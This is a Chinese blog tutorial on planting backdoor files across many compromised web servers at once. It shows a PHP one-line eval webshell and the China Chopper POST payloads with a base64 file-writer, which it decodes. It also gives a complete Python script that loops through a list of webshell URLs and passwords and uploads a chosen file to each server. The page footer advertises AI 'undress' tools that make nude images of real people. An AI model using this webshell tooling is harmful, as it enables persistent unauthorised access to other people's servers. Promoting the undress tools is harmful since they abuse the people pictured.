PHP实现批量上传单个文件,
PHP实现批量上传单个文件,
很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面临一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文给大家介绍基于php如何实现这类需求。
0×01 原理分析
首先,我们必须了解菜刀是如何通过一句话木马来实现web服务器的文件管理的。
下面是最常见的php一句话木马:
<?php eval($_POST[1]); ?>
当我们将一句话木马上传到web服务器上后,我们就可以直接在菜刀中输入上面的密码(如上例中的1)连接到服务器上来管理文件。
那么,此处的菜刀如何通过简单的一句话就可以实现对服务器的管理和控制呢?通过分析菜刀的原理,我们不难发现菜刀是利用了eval这个函数来执行通过POST方法传过来的命令语句。
因此,如果我们想通过菜刀一句话木马来实现文件上传的话,只需要向远程服务里上包含一句话的url发送一个带文件写入命令的POST请求即可,比如:
POST:
1=@eval($_POST[z0]);&z0=echo $_SERVER['DOCUMENT_ROOT'];
上面代码包含2个部分:
1. 一句话的密码
2. 发送给服务器端的php执行代码
既然知道原理了,我们只需要发送如下的POST请求即可完成利用一句话上传文件的功能:
POST:
1=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9JF9QT1NUWyJ6MSJdOwokYz0kX1BPU1RbInoyIl07CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7&z1=L3Zhci93d3cvcm9vdC8xLnR4dA==&z2=aGVsbG8gd29ybGQh
仔细分析一下这段POST数据包含以下几个部分:
1. 首先是php一句话的密码1
2. 通过eval方法来执行base64解码后的z0,解码整理后显示如下:
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$f=base64_decode($_POST["z1"]);
$c=base64_decode($_POST["z2"]);
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i<strlen($c);$i+=1)
$buf.=substr($c,$i,1);
echo(@fwrite(fopen($f,"w"),$buf));
echo("|<-");
die();3. 在z0中继续调用base64解码后的z1和z2,解码后如下:
z1=/var/www/root/1.txt z2=hello world!
至此,我们可以很清楚的发现上面的POST请求的作用实际上是将一个写有hello world!的名为1.txt的文件上传至服务器上/var/www/root/路径下。
0×02 代码实现
基于上面的原理分析,我们可以利用下面的代码基于php一句话来实现文件批量上传:
#!/usr/bin/python
#coding=utf-8
import urllib
import urllib2
import sys
import base64
import re
def post(url, data):
req = urllib2.Request(url)
data = urllib.urlencode(data)
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
response = opener.open(req, data)
return response.read()
def get_shell_path(posturl,passwd):
shell_path = ""
try:
data = {}
data[passwd] = '@eval(base64_decode($_POST[z0]));'
data['z0']='ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107'
shell_path = post(posturl, data).strip()
except Exception:
pass
return shell_path
def main():
print '\n+++++++++Batch Uploading Local File (Only for PHP webshell)++++++++++\n'
shellfile = sys.argv[1] # 存放webshell路径和密码的文件
localfile = sys.argv[2] # 本地待上传的文件名
shell_file = open(shellfile,'rb')
local_content = str(open(localfile,'rb').read())
for eachline in shell_file:
posturl = eachline.split(',')[0].strip()
passwd = eachline.split(',')[1].strip()
try:
reg = ".*/([^/]*\.php?)"
match_shell_name = re.search(reg,eachline)
if match_shell_name:
shell_name=match_shell_name.group(1)
shell_path = get_shell_path(posturl,passwd).strip()
target_path = shell_path.split(shell_name)[0]+localfile
target_path_base64 = base64.b64encode(target_path)
target_file_url = eachline.split(shell_name)[0]+localfile
data = {}
data[passwd] = '@eval(base64_decode($_POST[z0]));'
data['z0']='QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pOwokYz1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejIiXSk7CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7'
data['z1']=target_path_base64
data['z2']=base64.b64encode(local_content)
response = post(posturl, data)
if response:
print '[+] '+target_file_url+', upload succeed!'
else:
print '[-] '+target_file_url+', upload failed!'
else:
print '[-] '+posturl+', unsupported webshell!'
except Exception,e:
print '[-] '+posturl+', connection failed!'
shell_file.close()
if __name__ == '__main__':
main()webshell.txt的格式: [一句话webshell文件路径],[webshell连接密码]如下:
http://www.example1.com/1.php, 1
http://www.example2.com/1.php, 1
http://www.example3.com/1.php, 1
保存上面脚本为batch_upload_file.py,执行命令python batch_upload_file.py webshell.txt 1.txt,效果显示如下:
以上内容给大家介绍了PHP实现批量上传单个文件的相关知识,希望大家喜欢。
您可能感兴趣的文章:
- php批量上传的实现代码
- PHP批量上传图片的具体实现方法介绍.
- PHP中使用Session配合Javascript实现文件上传进度条功能
- PHP文件上传判断file是否己选择上传文件的方法
- 一个经典的PHP文件上传类分享
- 配置php.ini实现PHP文件上传功能
- php+jQuery.uploadify实现文件上传教程
- php上传文件并存储到mysql数据库的方法
- php实现将上传word文件转为html的方法
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1664
14
1421
52
1315
25
1266
29
1239
24
Explain JSON Web Tokens (JWT) and their use case in PHP APIs.
Apr 05, 2025 am 12:04 AM
JWT is an open standard based on JSON, used to securely transmit information between parties, mainly for identity authentication and information exchange. 1. JWT consists of three parts: Header, Payload and Signature. 2. The working principle of JWT includes three steps: generating JWT, verifying JWT and parsing Payload. 3. When using JWT for authentication in PHP, JWT can be generated and verified, and user role and permission information can be included in advanced usage. 4. Common errors include signature verification failure, token expiration, and payload oversized. Debugging skills include using debugging tools and logging. 5. Performance optimization and best practices include using appropriate signature algorithms, setting validity periods reasonably,
Explain late static binding in PHP (static::).
Apr 03, 2025 am 12:04 AM
Static binding (static::) implements late static binding (LSB) in PHP, allowing calling classes to be referenced in static contexts rather than defining classes. 1) The parsing process is performed at runtime, 2) Look up the call class in the inheritance relationship, 3) It may bring performance overhead.
What are PHP magic methods (__construct, __destruct, __call, __get, __set, etc.) and provide use cases?
Apr 03, 2025 am 12:03 AM
What are the magic methods of PHP? PHP's magic methods include: 1.\_\_construct, used to initialize objects; 2.\_\_destruct, used to clean up resources; 3.\_\_call, handle non-existent method calls; 4.\_\_get, implement dynamic attribute access; 5.\_\_set, implement dynamic attribute settings. These methods are automatically called in certain situations, improving code flexibility and efficiency.
PHP and Python: Comparing Two Popular Programming Languages
Apr 14, 2025 am 12:13 AM
PHP and Python each have their own advantages, and choose according to project requirements. 1.PHP is suitable for web development, especially for rapid development and maintenance of websites. 2. Python is suitable for data science, machine learning and artificial intelligence, with concise syntax and suitable for beginners.
PHP in Action: Real-World Examples and Applications
Apr 14, 2025 am 12:19 AM
PHP is widely used in e-commerce, content management systems and API development. 1) E-commerce: used for shopping cart function and payment processing. 2) Content management system: used for dynamic content generation and user management. 3) API development: used for RESTful API development and API security. Through performance optimization and best practices, the efficiency and maintainability of PHP applications are improved.
PHP: A Key Language for Web Development
Apr 13, 2025 am 12:08 AM
PHP is a scripting language widely used on the server side, especially suitable for web development. 1.PHP can embed HTML, process HTTP requests and responses, and supports a variety of databases. 2.PHP is used to generate dynamic web content, process form data, access databases, etc., with strong community support and open source resources. 3. PHP is an interpreted language, and the execution process includes lexical analysis, grammatical analysis, compilation and execution. 4.PHP can be combined with MySQL for advanced applications such as user registration systems. 5. When debugging PHP, you can use functions such as error_reporting() and var_dump(). 6. Optimize PHP code to use caching mechanisms, optimize database queries and use built-in functions. 7
Explain the match expression (PHP 8 ) and how it differs from switch.
Apr 06, 2025 am 12:03 AM
In PHP8, match expressions are a new control structure that returns different results based on the value of the expression. 1) It is similar to a switch statement, but returns a value instead of an execution statement block. 2) The match expression is strictly compared (===), which improves security. 3) It avoids possible break omissions in switch statements and enhances the simplicity and readability of the code.
PHP vs. Python: Understanding the Differences
Apr 11, 2025 am 12:15 AM
PHP and Python each have their own advantages, and the choice should be based on project requirements. 1.PHP is suitable for web development, with simple syntax and high execution efficiency. 2. Python is suitable for data science and machine learning, with concise syntax and rich libraries.
